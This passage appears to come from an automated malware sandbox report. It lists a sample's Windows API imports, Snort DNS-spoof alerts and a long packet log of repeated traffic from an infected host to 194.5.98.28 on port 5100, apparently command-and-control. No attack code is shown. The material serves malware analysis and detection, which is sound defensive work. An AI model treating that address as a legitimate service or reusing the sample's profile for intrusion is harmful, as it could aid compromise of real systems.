USER32.dll	EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll	RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/13/22-15:32:22.405814	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	57875	8.8.8.8	192.168.2.3
01/13/22-15:32:35.830669	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	52806	8.8.8.8	192.168.2.3
01/13/22-15:32:48.402158	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	60784	8.8.8.8	192.168.2.3
01/13/22-15:32:54.892461	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	51143	8.8.8.8	192.168.2.3
01/13/22-15:33:01.332628	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	56009	8.8.8.8	192.168.2.3
01/13/22-15:33:07.691280	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	55102	8.8.8.8	192.168.2.3
01/13/22-15:33:13.938372	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	49559	8.8.8.8	192.168.2.3
01/13/22-15:33:27.058039	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	60352	8.8.8.8	192.168.2.3
01/13/22-15:33:47.081904	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	64367	8.8.8.8	192.168.2.3
01/13/22-15:34:12.542040	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	63456	8.8.8.8	192.168.2.3
01/13/22-15:34:18.907708	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	58540	8.8.8.8	192.168.2.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2022 15:32:22.421966076 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:22.638089895 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:22.638262987 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:22.681634903 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:22.927839994 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:22.928119898 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:23.202478886 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:23.204865932 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:23.422007084 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:23.422168016 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:23.688400984 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:23.688625097 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:23.953144073 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:23.953242064 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:23.974941015 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:23.975009918 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:23.975030899 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:23.975071907 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:23.975084066 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:23.975142002 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:23.975311995 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:23.975361109 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.195730925 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.195770025 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.195786953 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.195801973 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.195871115 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.195933104 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.197261095 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.197288990 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.197380066 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.197438955 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.197463989 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.197529078 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.412081003 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.412120104 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.412270069 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.412296057 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.412353992 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.412378073 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.412425995 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.412484884 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.412549973 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.412600994 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.412719011 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.412767887 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.412918091 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.412942886 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.412969112 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.412988901 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.413502932 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.413558960 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.413671970 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.413722038 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.413892031 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.413948059 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.415338993 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.415370941 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.415414095 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.415436029 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.415725946 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.415752888 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.415776968 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.415795088 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.416074038 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.416125059 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.497258902 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.628937960 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.629045010 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.629529953 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.629594088 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.630927086 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.630968094 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.631002903 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.631011009 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.631057024 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.631068945 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.631100893 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.631103992 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.631145000 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.631146908 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.631190062 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.631191015 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.631226063 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.631232977 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.631272078 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.631275892 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.631309986 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.631315947 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.631356955 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.631359100 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.631392956 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.631400108 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.631441116 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.631443024 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.631479979 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.631480932 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.631520033 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.631522894 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.631560087 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.631561995 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.631599903 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.631607056 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.631639004 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.631642103 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.631678104 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.631688118 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.631720066 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.631722927 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.631762028 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.631776094 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.631805897 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.631983042 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.632018089 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.632054090 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.632105112 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.632105112 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.632149935 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.632247925 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.632297039 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.632605076 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.632642031 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.632647038 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.632685900 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.632873058 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.632936954 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.633028030 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.633065939 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.633076906 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.633111000 CET	5100	49743	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:24.633121967 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:24.633157015 CET	49743	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:28.587466955 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:28.803037882 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:28.803843021 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:28.816939116 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:29.091805935 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:29.092343092 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:29.499460936 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:29.500334024 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:29.716480970 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:29.716614008 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:30.002516031 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.002619028 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:30.283328056 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.288420916 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.288449049 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.288460016 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.288489103 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.288600922 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:30.288642883 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:30.505274057 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.505342007 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.505382061 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.505418062 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.505458117 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.505475998 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:30.505498886 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.505521059 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:30.505537987 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.505554914 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:30.505578995 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.505629063 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:30.722027063 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.722079039 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.722115993 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.722197056 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:30.722378969 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.722520113 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.722592115 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:30.722714901 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.722887039 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.722963095 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:30.723069906 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.723108053 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.723165989 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:30.723223925 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.723428011 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.723494053 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:30.723577976 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.723612070 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.723666906 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:30.723968029 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.724004030 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.724035025 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.724057913 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:30.724078894 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:30.726358891 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:30.944190979 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.944212914 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.944231033 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.944247007 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.944264889 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.944281101 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.944292068 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:30.944297075 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.944314957 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.944345951 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:30.944353104 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:30.944504023 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.944560051 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.944576979 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.944596052 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.944612026 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.944614887 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:30.944629908 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.944643974 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:30.944649935 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.944653034 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:30.944668055 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.944684982 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.944694042 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:30.944703102 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.944720030 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.944729090 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:30.944737911 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.944750071 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:30.944755077 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.944782019 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:30.944811106 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:30.944919109 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.944933891 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.944962978 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:30.944964886 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.945017099 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:30.945072889 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.945091009 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.945106983 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.945123911 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.945137978 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:30.945141077 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.945168972 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:30.945173979 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.945192099 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:30.945213079 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.945223093 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:30.945331097 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.945348024 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.945383072 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:30.945415020 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:30.999661922 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:30.999780893 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.160742998 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.160794020 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.160902023 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.164273977 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.164333105 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.164374113 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.164414883 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.164418936 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.164453983 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.164459944 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.164494038 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.164506912 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.164537907 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.164545059 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.164582014 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.164619923 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.164633036 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.164659023 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.164661884 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.164695978 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.164710045 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.164735079 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.164742947 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.164774895 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.164781094 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.164813995 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.164817095 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.164855003 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.164860010 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.164891958 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.164896965 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.164935112 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.165606022 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.165648937 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.165684938 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.165698051 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.165725946 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.165735006 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.165765047 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.165769100 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.165805101 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.166162968 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.166220903 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.166347980 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.166510105 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.166568041 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.168873072 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.169023037 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.169092894 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.169152021 CET	49744	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:31.169681072 CET	5100	49744	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:31.169723034 CET	5100	49744	194.5.98.28	192.168.2.3
